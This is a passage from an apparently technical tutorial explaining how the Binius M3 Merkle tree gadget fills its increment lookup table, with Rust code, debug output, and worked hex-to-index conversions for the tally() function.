&lt;p&gt;When the &lt;code&gt;MerkleTreeCS&lt;&#x2F;code&gt; is set up, an &lt;code&gt;IncrLookup&lt;&#x2F;code&gt; instance is created (see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;merkle_tree&#x2F;mod.rs#L87&quot;&gt;here&lt;&#x2F;a&gt;) through its method &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;indexed_lookup&#x2F;incr.rs#L176&quot;&gt;new()&lt;&#x2F;a&gt;, which does the following:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Fixes the size for the columns:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;table.require_fixed_size(IncrIndexedLookup.log_size());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;Note that &lt;code&gt;IncrIndexedLookup.log_size()&lt;&#x2F;code&gt; is $9$, so the column has $2^9 = 512$ entries, as you can see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;indexed_lookup&#x2F;incr.rs#L245&quot;&gt;here&lt;&#x2F;a&gt;. This is because each index $i \in \{0, \ldots, 511\}$ of the column represents the incrementation of a particular input: the 8 least significant bits of $i$ give the input, and the most significant bit gives the carry.&lt;&#x2F;p&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;
&lt;p&gt;Adds the &lt;code&gt;entries_ordered&lt;&#x2F;code&gt; and &lt;code&gt;entries_sorted&lt;&#x2F;code&gt; columns to the table.&lt;&#x2F;p&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;
&lt;p&gt;Adds &lt;strong&gt;flushing rules&lt;&#x2F;strong&gt; for the &lt;code&gt;permutation_channel&lt;&#x2F;code&gt; of our constraint system to ensure that one column is a permutation of the other:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Use flush to check that entries_sorted is a permutation of entries_ordered.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;table.push(permutation_chan, [entries_ordered]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;table.pull(permutation_chan, [entries_sorted]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;
&lt;p&gt;Configures a &lt;code&gt;LookupProducer&lt;&#x2F;code&gt; to manage how entries are queried and to handle their multiplicities (how many times each specific increment operation occurs during the proof).&lt;&#x2F;p&gt;
&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;&lt;h3 id=&quot;table-population-1&quot;&gt;Table population&lt;&#x2F;h3&gt;
&lt;p&gt;As well as the other tables, the &lt;code&gt;incr_table&lt;&#x2F;code&gt; of the &lt;code&gt;MerkleTreeCS&lt;&#x2F;code&gt; is filled inside the function &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;merkle_tree&#x2F;mod.rs#L100&quot;&gt;fill_tables()&lt;&#x2F;a&gt;, specifically in this part:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let lookup_counts = tally(cs, witness, &amp;amp;[], self.lookup_channel, &amp;amp;IncrIndexedLookup)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Fill the lookup table with the sorted counts&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let sorted_counts = lookup_counts&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .into_iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .enumerate()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .sorted_by_key(|(_, count)| Reverse(*count))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .collect::&amp;lt;Vec&amp;lt;_&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;witness.fill_table_parallel(&amp;amp;self.incr_table, &amp;amp;sorted_counts)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Let’s break down this code snippet in detail. To do that, we have to understand what the variable &lt;code&gt;lookup_counts&lt;&#x2F;code&gt; is and what the function &lt;code&gt;tally()&lt;&#x2F;code&gt; does.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;lookup-counts&quot;&gt;Lookup Counts&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;code&gt;lookup_counts&lt;&#x2F;code&gt; is a vector of 512 integer elements. This vector is the result of the function &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;builder&#x2F;indexed_lookup.rs#L51&quot;&gt;tally()&lt;&#x2F;a&gt;. As its documentation explains, this function “determines the read counts of each entry in an indexed lookup table”. It iterates over every table of our constraint system looking for a specific flushing rule: a pull operation on the input channel. In our case, the input channel is called &lt;code&gt;lookup_channel&lt;&#x2F;code&gt;. Whenever it finds this flushing rule it adds 1 to the result vector at a specific index (that depends on the value being pulled).&lt;&#x2F;p&gt;
&lt;p&gt;To understand how this index is chosen let’s add some prints and see what happens in our example.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn tally&amp;lt;P&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	cs: &amp;amp;ConstraintSystem&amp;lt;B128&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	&#x2F;&#x2F; TODO: This doesn&amp;#39;t actually need mutable access. But must of the WitnessIndex methods only&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	&#x2F;&#x2F; allow mutable access.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	witness: &amp;amp;mut WitnessIndex&amp;lt;P&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	boundaries: &amp;amp;[Boundary&amp;lt;B128&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	chan: ChannelId,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	indexed_lookup: &amp;amp;impl IndexedLookup&amp;lt;B128&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; Result&amp;lt;Vec&amp;lt;u32&amp;gt;, Error&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	P: PackedField&amp;lt;Scalar = B128&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		+ PackedExtension&amp;lt;B1&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		+ PackedExtension&amp;lt;B8&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		+ PackedExtension&amp;lt;B16&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		+ PackedExtension&amp;lt;B32&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		+ PackedExtension&amp;lt;B64&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		+ PackedExtension&amp;lt;B128&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	println!(&amp;quot;------- Look up counts for channel: {chan} -------&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	let mut counts = vec![0; 1 &amp;lt;&amp;lt; indexed_lookup.log_size()]; &#x2F;&#x2F; 2^{8+1} &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	&#x2F;&#x2F; Tally counts from the tables&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	for table in &amp;amp;cs.tables {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		&#x2F;&#x2F; In merkle tree example, NodesTable and RootTable&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		if let Some(table_index) = witness.get_table(table.id()) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;			println!(&amp;quot;--- Processing table: {} (ID: {}) ---&amp;quot;, table.name, table.id());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;			for partition in table.partitions.values() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;				for flush in &amp;amp;partition.flushes {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;					if flush.channel_id == chan &amp;amp;&amp;amp; flush.direction == FlushDirection::Pull {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						&#x2F;&#x2F; In the merkle tree example, this occurs in every NodesTable pull from the&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						&#x2F;&#x2F; lookup_channel.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						println!(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;							&amp;quot;Found matching flush: The table has a Pull operation on channel {}&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;							chan&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						let table_size = table_index.size();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						&#x2F;&#x2F; TODO: This should be parallelized, which is pretty tricky.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						let segment = table_index.full_segment();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						let cols = flush&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;							.columns&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;							.iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;							.map(|&amp;amp;col_index| segment.get_dyn(col_index))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;							.collect::&amp;lt;Result&amp;lt;Vec&amp;lt;_&amp;gt;, _&amp;gt;&amp;gt;()?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						if !flush.selectors.is_empty() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;							&#x2F;&#x2F; TODO: check flush selectors&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;							todo!(&amp;quot;tally does not support selected table reads yet&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						let mut elems = vec![B128::ZERO; cols.len()];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						&#x2F;&#x2F; It&amp;#39;s important that this is only the unpacked table size(rows * values&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						&#x2F;&#x2F; per row in the partition), not the full segment size. The entries&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						&#x2F;&#x2F; after the table size are not flushed.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						for i in 0..table_size * partition.values_per_row {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;							for (elem, col) in iter::zip(&amp;amp;mut elems, &amp;amp;cols) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;								*elem = col.get(i);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;							}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;							let index = indexed_lookup.entry_to_index(&amp;amp;elems);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;							println!(&amp;quot;Index {index} corresponds to element: {:?}&amp;quot;, elems);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;							counts[index] += 1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;						}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;					}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;				}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;			}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This should first print the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;------- Look up counts for channel: 2 -------&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;--- Processing table: merkle_tree_nodes_left (ID: 0) ---&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Found matching flush: The table has a Pull operation on channel 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Index 258 corresponds to element: [BinaryField128b(0x00000000000000000000000000010302)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Index 257 corresponds to element: [BinaryField128b(0x00000000000000000000000000010201)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This tells us the following: we are looking for pull outs on channel 2 (the &lt;code&gt;lookup_channel&lt;&#x2F;code&gt;), and we first analyze the &lt;code&gt;NodesTable&lt;&#x2F;code&gt; that holds the &lt;em&gt;left events&lt;&#x2F;em&gt;. In that table it encountered two pull outs from the channel:&lt;&#x2F;p&gt;
&lt;p&gt;1. The first pull out is &lt;code&gt;BinaryField128b(0x00000000000000000000000000010302)&lt;&#x2F;code&gt;. To understand what this binary field element represents, follow these steps:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Convert its hex value to a binary expansion: $$0\text{x}10302 = 00010000001100000010$$&lt;&#x2F;li&gt;
&lt;li&gt;Take the 8 least significant bits. The resulting number is called the &lt;em&gt;input&lt;&#x2F;em&gt;: $00000010$.&lt;&#x2F;li&gt;
&lt;li&gt;Take the bit at position 16 (counting from the LSB and starting at 0). This bit is called the &lt;em&gt;carry in&lt;&#x2F;em&gt;: $1$.&lt;&#x2F;li&gt;
&lt;li&gt;Concatenate them as &lt;em&gt;carry in&lt;&#x2F;em&gt; || &lt;em&gt;input&lt;&#x2F;em&gt;, which gives $100000010$.&lt;&#x2F;li&gt;
&lt;li&gt;The result is the binary expansion of our index: $100000010 = 258$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
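&lt;p&gt;The bit manipulation above can be sketched as a small standalone function. This is a hypothetical illustration of the index encoding, not the actual &lt;code&gt;entry_to_index()&lt;&#x2F;code&gt; implementation in Binius:&lt;&#x2F;p&gt;

```rust
// Hypothetical sketch of the lookup-index encoding described above:
// bits 0..=7 of the entry are the input and bit 16 is the carry; the
// index is the 9-bit number (carry || input).
fn entry_to_index(entry: u64) -> u64 {
    let input = entry & 0xFF; // 8 least significant bits
    let carry = (entry >> 16) & 1; // bit at position 16
    (carry << 8) | input // concatenate: carry || input
}

fn main() {
    // The three entries pulled in the Merkle tree example.
    assert_eq!(entry_to_index(0x10302), 258);
    assert_eq!(entry_to_index(0x10201), 257);
    assert_eq!(entry_to_index(0x10100), 256);
}
```

Running it confirms the three indices derived by hand in this section.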
&lt;p&gt;Now, what does all of this have to do with our Merkle tree? Well, the index $258$ represents the parent’s and children’s depths in the following event:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;ryf9s5lEgl.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Since the parent’s depth is 2, the input will be $00000010$. And since the children’s depth is the parent’s plus one, the carry is $1$. You can see this better at the initialization of every &lt;code&gt;NodesTable&lt;&#x2F;code&gt; (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;merkle_tree&#x2F;mod.rs#L249&quot;&gt;here&lt;&#x2F;a&gt;), in this specific part:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let parent_depth = table.add_committed(&amp;quot;parent_depth&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let one = table.add_constant(&amp;quot;one&amp;quot;, [B1::ONE]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let increment = Incr::new(&amp;amp;mut table, lookup_chan, parent_depth, one);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let child_depth = increment.output;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Here, the &lt;code&gt;input&lt;&#x2F;code&gt; is &lt;code&gt;parent_depth&lt;&#x2F;code&gt; and the &lt;code&gt;carry_in&lt;&#x2F;code&gt; is &lt;code&gt;one&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;2. The second pull out is &lt;code&gt;BinaryField128b(0x00000000000000000000000000010201)&lt;&#x2F;code&gt;. Let’s do the same thing we did above:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Convert to binary: $$0\text{x}10201 = 00010000001000000001$$&lt;&#x2F;li&gt;
&lt;li&gt;Then &lt;code&gt;input = 00000001&lt;&#x2F;code&gt;, meaning it represents an event whose parent’s depth is 1.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;carry_in = 1&lt;&#x2F;code&gt; because the children’s depth is the parent’s depth plus 1.&lt;&#x2F;li&gt;
&lt;li&gt;Concatenate to get the index: $100000001 = 257$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;This index corresponds to the following event:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;Skm17oe4ll.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Now, let’s see what else the function &lt;code&gt;tally()&lt;&#x2F;code&gt; printed. You should also see this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;--- Processing table: merkle_tree_nodes_right (ID: 1) ---&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Found matching flush: The table has a Pull operation on channel 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Index 257 corresponds to element: [BinaryField128b(0x00000000000000000000000000010201)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Index 258 corresponds to element: [BinaryField128b(0x00000000000000000000000000010302)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Note that we have here the same indices as before. That’s because the right events have the same parent depths as the left ones:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;SkTU7oxNeg.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;After that you should see in your terminal the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;--- Processing table: merkle_tree_nodes_both (ID: 2) ---&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Found matching flush: The table has a Pull operation on channel 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Index 256 corresponds to element: [BinaryField128b(0x00000000000000000000000000010100)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Here, note that $$0\text{x}10100 = 00010000000100000000.$$ Then &lt;code&gt;input = 00000000&lt;&#x2F;code&gt;, which means the parent’s depth is 0. The index $256 = 100000000$ represents both the left and the right event:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;rkTmBjxElx.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Finally, you should see printed the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;--- Processing table: merkle_tree_roots (ID: 3) ---&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This means that it processed the roots table but, as expected, it didn’t find any pull out from the lookup channel.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;sorted-counts&quot;&gt;Sorted counts&lt;&#x2F;h4&gt;
&lt;p&gt;Recall that we were trying to understand how the &lt;code&gt;incr_table&lt;&#x2F;code&gt; is populated. After calculating all the &lt;code&gt;lookup_counts&lt;&#x2F;code&gt;, we sort them in a specific way, store the result in &lt;code&gt;sorted_counts&lt;&#x2F;code&gt;, and use it to fill the table.&lt;&#x2F;p&gt;
&lt;p&gt;The variable &lt;code&gt;sorted_counts&lt;&#x2F;code&gt; is a vector of 512 tuples. The first element of each tuple is an index, and the second element is the count that &lt;code&gt;lookup_counts&lt;&#x2F;code&gt; has at that index. These tuples are sorted by count, from highest to lowest. Once more, let’s add a print in the function &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;merkle_tree&#x2F;mod.rs#L100&quot;&gt;fill_tables()&lt;&#x2F;a&gt; to understand it better:&lt;&#x2F;p&gt;
